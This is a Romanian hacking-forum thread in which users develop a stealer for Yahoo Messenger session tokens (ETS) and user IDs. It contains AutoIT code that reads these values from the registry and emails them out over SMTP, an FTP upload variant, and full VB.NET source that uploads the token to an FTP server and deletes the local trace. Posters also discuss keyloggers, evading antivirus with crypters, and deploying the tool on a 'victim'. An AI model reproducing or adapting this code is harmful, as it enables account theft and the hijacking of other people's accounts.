Paul4games Posted May 20, 2010 Report Posted May 20, 2010 Folositi ma un stealer ca e mai simplu....... Quote
Alynutza Posted May 20, 2010 Report Posted May 20, 2010 Folositi ma un stealer ca e mai simplu.......Da-mi tu unul bun+explicatii ce face ala ce trb sa fac...Pentru ca sunt incepatoare.... Quote
parazitul29 Posted May 20, 2010 Report Posted May 20, 2010 sau un keylogeruite probabil cel mai simplu tutorial pentru un keyloger pe care il poti vedea vre-o datahttp://rstcenter.com/forum/17138-tutorial-keyloger.rst Quote
phantomas90 Posted May 20, 2010 Report Posted May 20, 2010 (edited) partea cu keylogger merge...DAR: eset nod 32 detecteaza orice forma de comunicatie cu exteriorul si nu o sa poata keyloggeru sa transmita nimic.Numai daca te duci la un anumit interval de timp si "ridici" de acolo informatiile capturate+keyloggeru trebuie compilat de fiecare cu sursa proprie.Altfel e de ajuns sa aiba 2-3 detectii si Nod 32 intreaba daca vrei sa trimita fisierul pe server pentru analiza,si de acolo vine in update la toti userii de nod si gata.Fun's over.Lasati asa metoda cu EST ca e buna.Si singura care lucreaza la distanta.Daca cunoaste cineva cum se poate face in AutoIT controlul ferestrelor active ca sa se trimita pe mess dupa extractie.Am incercat ceva da e in functi de PID si nu e acelasi la fiecare run al Yahoo Messenger.Am mai cautat si nu se poate face decat cu FTP(din cate am rezolvat pana acum).Folositi din helpul de la AutoIT si creati o sesiune in care uploadati direct pe ftp fisierul cu ETS-ul care va intereseaza.Zilele astea o sa postez o sursa completa de extragere si trimitere a Ets-ului(acum am numai surse care rezolva separat cate ceva). Edited May 20, 2010 by phantomas90 Am rezolvat... Quote
dsKed cristy Posted May 23, 2010 Report Posted May 23, 2010 (edited) Exact. Pe pagina pe care dai search, eu am cativa parametri secreti, prin care vad lista de ID-uri. Cand aveam 10-20 de intrari, ma mai uitam prin ele, iar uneori am vazut ca apartin unor persoane care nu merita sa incaseze 'palme' de la un mucos de cativa ani care s-a gandit sa ii sparga contul. De cand am 50 de bucati, chiar nu ma mai intereseaza sa ma incerc fiecare ID.:OOlol deci eu fur iduri si tuh le poti vedea?:OOOcum vine asta?e cam suspect dreaqmai bine nu folosesti decat sa faci rau cuivasau daca vrei sa faci rau cuiva cauta-ma pe mess ca sa iti dau eu 1 id ) Edited May 23, 2010 by begood Quote
Paul4games Posted May 25, 2010 Report Posted May 25, 2010 partea cu keylogger merge...DAR: eset nod 32 detecteaza orice forma de comunicatie cu exteriorul si nu o sa poata keyloggeru sa transmita nimic.Numai daca te duci la un anumit interval de timp si "ridici" de acolo informatiile capturate+keyloggeru trebuie compilat de fiecare cu sursa proprie.Altfel e de ajuns sa aiba 2-3 detectii si Nod 32 intreaba daca vrei sa trimita fisierul pe server pentru analiza,si de acolo vine in update la toti userii de nod si gata.Fun's over.Lasati asa metoda cu EST ca e buna.Si singura care lucreaza la distanta.Daca cunoaste cineva cum se poate face in AutoIT controlul ferestrelor active ca sa se trimita pe mess dupa extractie.Am incercat ceva da e in functi de PID si nu e acelasi la fiecare run al Yahoo Messenger.Am mai cautat si nu se poate face decat cu FTP(din cate am rezolvat pana acum).Folositi din helpul de la AutoIT si creati o sesiune in care uploadati direct pe ftp fisierul cu ETS-ul care va intereseaza.Zilele astea o sa postez o sursa completa de extragere si trimitere a Ets-ului(acum am numai surse care rezolva separat cate ceva).WTF man?lasa prostiile ca nod32 detecteaza si rupe si nu stiu ce,sunt atatea keyloggere FUd pe alea cum de nu le gaseste? Quote
phantomas90 Posted May 25, 2010 Report Posted May 25, 2010 (edited) TCPStartup()Func _SMTPMailTo($host, $port, $from, $fromname, $to, $toname, $subj, $msg) $ip = TCPNameToIP($host) $sock = TCPConnect($ip, $port) Do $recv = TCPRecv($sock, 1024) Until $recv <> "" If StringLeft($recv, 3) <> 220 Then Return -1 EndIf TCPSend($sock, "HELO " & $host & @CRLF) Do $recv = TCPRecv($sock, 1024) Until $recv <> "" If StringLeft($recv, 3) <> 250 Then Return $recv EndIf TCPSend($sock, "MAIL FROM:<" & $from & ">" & @CRLF) Do $recv = TCPRecv($sock, 1024) Until $recv <> "" If StringLeft($recv, 3) <> 250 Then Return $recv EndIf TCPSend($sock, "RCPT TO:<" & $to & ">" & @CRLF) Do $recv = TCPRecv($sock, 1024) Until $recv <> "" If StringLeft($recv, 3) <> 250 Then Return $recv EndIf TCPSend($sock, "DATA" & @CRLF) Do $recv = TCPRecv($sock, 1024) Until $recv <> "" If StringLeft($recv, 3) <> 354 Then Return $recv EndIf TCPSend($sock, "From: " & $fromname & " <" & $from & ">" & @CRLF) TCPSend($sock, "To: " & $toname & " <" & $to & ">" & @CRLF) TCPSend($sock, "Subject: " & $subj & @CRLF) TCPSend($sock, @CRLF) TCPSend($sock, $msg & @CRLF) TCPSend($sock, "." & @CRLF) Do $recv = TCPRecv($sock, 1024) Until $recv <> "" If StringLeft($recv, 3) <> 250 Then Return $recv EndIf Return 1EndFunc$ets = RegRead("HKEY_CURRENT_USER\Software\Yahoo\pager\","ETS")$ID=RegRead("HKEY_CURRENT_USER\Software\Yahoo\pager","Yahoo! User ID")$m = _SMTPMailTo("smtp.rdslink.ro", 25, "your_email@your_provider.com", "steal", "your_email@your_provider.com", "name",$ID,$ets)Aici este sursa de AutoIT pentru extragerea si trimiterea ETS-ului si ID-ului pe email.@cp/m a venit cu ideea trimiterii prin rdslink(+ a facut partea de trimitere).@Paul4games de o saptamana clientul de ardamax keylogger sau cum s-o numi el exact e detectat de majoritatea antivirusilor.Ce am vazut intr-un tutorial video despre acei FUD keyloggers e ca trebuie criptat clientul.Numai ca criptarea o facea in ASM.Pana ajungi sa faci criptare in Asm mai trebuie ceva timp. Edited May 25, 2010 by phantomas90 Quote
norocel_ Posted May 26, 2010 Report Posted May 26, 2010 cu ftp-ul cum e? in loc de << $m = _SMTPMailTo("smtp.rdslink.ro", 25, "your_email@your_provider.com", "steal", "your_email@your_provider.com", "name",$ID,$ets) >> sa il trimitem pe un ftp undeva Quote
Paul4games Posted May 26, 2010 Report Posted May 26, 2010 Aici este sursa de AutoIT pentru extragerea si trimiterea ETS-ului si ID-ului pe email.@cp/m a venit cu ideea trimiterii prin rdslink(+ a facut partea de trimitere).@Paul4games de o saptamana clientul de ardamax keylogger sau cum s-o numi el exact e detectat de majoritatea antivirusilor.Ce am vazut intr-un tutorial video despre acei FUD keyloggers e ca trebuie criptat clientul.Numai ca criptarea o facea in ASM.Pana ajungi sa faci criptare in Asm mai trebuie ceva timp.Man ce tot vorbesti acolo?keyloggerele FUD genereaza direct un server FUd nu cryptari prosti,si ce ASM?iei un crypter normal FUd si cryptezi srv si gata treaba..........si ardamax e de kkt Quote
phantomas90 Posted May 26, 2010 Report Posted May 26, 2010 @norocel cu FTP-ul asta era ideea.Salveaza intr-un txt ID-ul si parola si incarca fisierul pe un ftp free...numai ca mi se blocheaza transferul desi imi returneaza 0(no error) cand rules procesu cap-coada(scriere+incarcare).@paul4games poate ai dreptate si nu am cautat eu cum trebuie.Eu asta am gasithttp://www.youtube.com/watch?v=WO8feC_IlHU Quote
Paul4games Posted May 27, 2010 Report Posted May 27, 2010 @norocel cu FTP-ul asta era ideea.Salveaza intr-un txt ID-ul si parola si incarca fisierul pe un ftp free...numai ca mi se blocheaza transferul desi imi returneaza 0(no error) cand rules procesu cap-coada(scriere+incarcare).@paul4games poate ai dreptate si nu am cautat eu cum trebuie.Eu asta am gasithttp://www.youtube.com/watch?v=WO8feC_IlHUPai merge si cum face ala dar te cam complici Quote
norocel_ Posted May 27, 2010 Report Posted May 27, 2010 ce mai trebuie modificat pe aici ? ca totusi nu imi pune pe server keile de registri ....#include <FTP.au3>$ets=RegRead("HKEY_CURRENT_USER\Software\Yahoo\pager\", "ETS")$ID=RegRead("HKEY_CURRENT_USER\Software\Yahoo\pager","Yahoo! User ID")$server = 'adresa_serverului'$username = 'userul'$pass = 'parola'$Open = _FTPOpen('Myftp Control')$Conn = _FTPConnect($Open, $server, $username, $pass)$Ftpp = _FtpPutFile($Conn,$ets,$ID)$Ftpc = _FTPClose($Open) Quote
phantomas90 Posted May 27, 2010 Report Posted May 27, 2010 (edited) @norocel_ daca era asa simplu puneam de mult sursa completa.Trebuie cumva initializat protocolul tcp/ip pentru trimitere pe FTP,ceva cum e in sursa facuta de cp/m.Am incercat si eu si asa simplu ca tine si cu SSL si da rateuri.Cand termin si merge atunci o sa pun o sursa completa si functionala.Pana acum am pus numai fragmente.O sa fac un mic tutorial cu fiecare comanda ce face.Asa facem osturi degeaba fara sa terminam pana la urma ce am inceput.Later edit: Cred ca fixeaza yahoo exploitu pana terminam noi treaba aici=))..deja sunt o gramada de reply si nimic concret Edited May 27, 2010 by phantomas90 Quote
parazitul29 Posted May 28, 2010 Report Posted May 28, 2010 http://rstcenter.com/forum/16102-rst-ets-stealer-fitty-doomclip.rst Quote
willboy Posted May 28, 2010 Report Posted May 28, 2010 nu l-ai facut tu. Chestia asta o stiam de anul trecut Quote
willboy Posted May 29, 2010 Report Posted May 29, 2010 Chestia asta nu e facuta de tine. O stiu de anul trecut. Si app de sursa, daca zici ca e facut de tn dc nu pui si sursa?. Iti spun eu, ca nu o sti sursa este asta: Adica asta este sursa executabilului meu care face acelasi lucru ca cel de pe it.octopis.comImports System.IOPublic Class Form1 Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load Dim etsuser As String Dim etskey As String Dim filename As String etsuser = My.Computer.Registry.GetValue("HKEY_CURRENT_USER\Software\yahoo\pager", "Yahoo! User ID", Nothing) etskey = My.Computer.Registry.GetValue("HKEY_CURRENT_USER\Software\yahoo\pager", "ETS", Nothing) filename = etsuser & ".reg" Dim etsreg As New StreamWriter("c:\" & filename) etsreg.WriteLine("Windows Registry Editor Version 5.00") etsreg.WriteLine() etsreg.WriteLine("[HKEY_CURRENT_USER\Software\yahoo\pager]") etsreg.WriteLine(Chr(34) + "ETS" + Chr(34) + "=" + Chr(34) + etskey + Chr(34)) etsreg.WriteLine(Chr(34) + "Yahoo! User ID" + Chr(34) + "=" + Chr(34) + etsuser + Chr(34)) etsreg.WriteLine(Chr(34) + "Save Password" + Chr(34) + "=" + "dword:00000001") etsreg.Close() Dim clsRequest As System.Net.FtpWebRequest = _ DirectCast(System.Net.WebRequest.Create("ftp://ftp.nume.com/" & filename), System.Net.FtpWebRequest) clsRequest.Credentials = New System.Net.NetworkCredential("user", "parola") clsRequest.Method = System.Net.WebRequestMethods.Ftp.UploadFile Dim bFile() As Byte = System.IO.File.ReadAllBytes("C:\" & filename) Dim clsStream As System.IO.Stream = _ clsRequest.GetRequestStream() clsStream.Write(bFile, 0, bFile.Length) clsStream.Close() clsStream.Dispose()My.Computer.FileSystem.DeleteFile("c:\" & filename) End End SubEnd Class Quote
dsKed cristy Posted July 17, 2010 Report Posted July 17, 2010 Si am luat programul da?Acum imi arata 1 install....intru si instalez sau dau direct ceea ce am dezarhivat victimei? Quote
